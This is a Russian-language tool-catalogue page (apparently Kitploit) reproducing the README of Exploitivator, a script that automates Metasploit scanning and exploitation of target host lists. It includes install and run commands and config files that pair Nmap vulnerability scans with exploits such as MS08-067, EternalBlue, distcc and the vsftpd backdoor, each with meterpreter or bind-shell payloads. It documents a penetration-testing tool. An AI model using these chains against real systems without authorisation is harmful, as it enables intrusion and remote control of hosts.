Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Exploitivator — Автоматизация сканирования и эксплуатации Metasploit | Kitploit
Инструменты/GitHubGitHub/n1ckdunn/exploitivator
Фреймворки для пентестаСканеры уязвимостейФреймворки для эксплойтовРазработка Полезной Нагрузки
GitHubn1ckdunn/exploitivator

Exploitivator

Автоматизация сканирования и эксплуатации Metasploit

Репозиторий
118281 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Exploitivator

V2.0 - изменен для использования Python 3

Prerequisites

Тестировалось только на Kali.

Зависит от модуля pymetasploit3 для Python, подробно описанного здесь: https://coalfire.com/the-coalfire-blog/pymetasploit3-metasploit-automation-library

Установите необходимые пакеты Kali и гем PostgreSQL для Ruby:

root@kitploit:~
apt-get install postgresql libpq-dev git-core

gem install pg 

Установите текущую версию модуля pymetasploit3 для Python 3:

root@kitploit:~
pip3 install pymetasploit3

Usage

Перед запуском любого из скриптов загрузите msfconsole и запустите службу MSGRPC.
MSGRPC можно запустить с помощью msfrpcd в Metasploit следующим образом:

root@kitploit:~
load msgrpc Pass=abc123 ServerHost=0.0.0.0 ServerPort=55552

Результаты сканирования и/или эксплуатации появятся в консоли Metasploit и в выходных файлах (msf_scan_output.txt и exploitivator_output.txt).

Используйте MSFScan для запуска нескольких сканирований Metasploit против группы целевых хостов. Используйте Exploitivator для запуска сканирований Nmap script против группы целевых хостов и автоматической эксплуатации тех, которые сообщены как уязвимые.

Exploitivator

Использование командной строки:

Примеры: Приложение может быть запущено следующим образом, где '10.128.108.178' — это IP-адрес атакующей машины, 'hosts.txt' — список целевых хостов, 'msf' — имя пользователя Metasploit Postgres и 'abc123' — пароль Metasploit Postgres:

root@kitploit:~
./exploitivator.py -l 10.128.108.178 -f hosts.txt -u msf -m abc123

MSFScan

Использование командной строки:

root@kitploit:~
./msf_scan.py filename 
./msf_scan.py filename MSF_DB_Username MSF_DB_Password

Примеры: Приложение может быть запущено следующим образом, где 'hosts.txt' — это список целевых хостов, 'msf' — имя пользователя Metasploit Postgres и 'abc123' — пароль Metasploit Postgres:

root@kitploit:~
./msf_scan.py hosts.txt msf abc123

Для запуска с 'hosts.txt' в качестве списка целевых хостов, используя имя пользователя Metasploit Postgres по умолчанию (msf) и пароль Metasploit Postgres по умолчанию (abc123):

root@kitploit:~
./msf_scan.py hosts.txt

Config Files

Оба скрипта полагаются на файлы конфигурации для предоставления деталей необходимых сканирований и атак Nmap и Metasploit.

MSFScan

Скрипт использует файл конфигурации с именем 'scan_types.cfg'. Он содержит список путей для любых сканирований Metasploit, которые будут запущены против целей. например:

root@kitploit:~
auxiliary/scanner/dcerpc/endpoint_mapper
auxiliary/scanner/smb/smb_version
auxiliary/scanner/x11/open_x11
auxiliary/scanner/discovery/ipv6_multicast_ping
auxiliary/scanner/discovery/ipv6_neighbor
auxiliary/scanner/smb/smb_login

Exploitivator

Этот скрипт использует два файла конфигурации (exploitivator_scan.cfg и exploitivator.cfg). Один для указания сканирований и параметров Nmap (exploitivator_scan.cfg), а другой для указания полезных нагрузок и параметров Metasploit (exploitivator.cfg). Они используют '##' в качестве разделителя и имеют следующие форматы.

exploitivator_scan.cfg:

root@kitploit:~
[Label]##[Параметры командной строки Nmap]##[Параметры командной строки Nmap для вывода в файл]##[Опционально - команда grep для использования, если используется выводимый в greppable формате Nmap]

В приведённом выше формате:

root@kitploit:~
1) Первая секция — это метка, связывающая сканирование с эксплойтом
2) Вторая секция — это часть командной строки Nmap, которая указывает детали типа запускаемого сканирования, такие как порт и скрипт
3) Третья секция — это часть командной строки Nmap, которая определяет выходной файл Nmap (Exploitivator обрабатывает XML или greppable вывод Nmap)
4) Опциональная четвёртая секция — это команда grep, которую вы хотите использовать для идентификации уязвимой цели внутри файла '.gnmap'

Пример содержимого файла показан ниже:

root@kitploit:~
SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml
SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml
SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml
SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml
SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml
DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632\/open\/tcp\/\/distccd"
JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099\/open\/tcp\/\/rmi
VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##grep "vsftpd 2.3.4"

exploitivator.cfg:

root@kitploit:~
[Label]##[Путь к эксплойту Metasploit]##[Опционально - детали полезной нагрузки Metasploit]

Пример содержимого файла показан ниже:

root@kitploit:~
SMB_08-067##exploit/windows/smb/ms08_067_netapi##windows/meterpreter/bind_tcp
SMB_09-050##exploit/windows/smb/ms09_050_smb2_negotiate_func_index##windows/meterpreter/bind_tcp
SMB_10-061##exploit/windows/smb/ms10_061_spoolss##windows/meterpreter/bind_tcp
SMB_17-010##exploit/windows/smb/ms17_010_eternalblue##windows/meterpreter/bind_tcp
DistCC##exploit/unix/misc/distcc_exec##cmd/unix/bind_ruby
JavaRMI##exploit/multi/misc/java_rmi_server##php/meterpreter/bind_tcp
VSFTPBackDoor##exploit/unix/ftp/vsftpd_234_backdoor##none

References

Starting and connecting to MSGRPC: https://coalfire.com/the-coalfire-blog/pymetasploit3-metasploit-automation-library

Setting RHOSTS to use a file instead of a range: http://travisaltman.com/metasploit-set-rhosts-file/

Скачать инструмент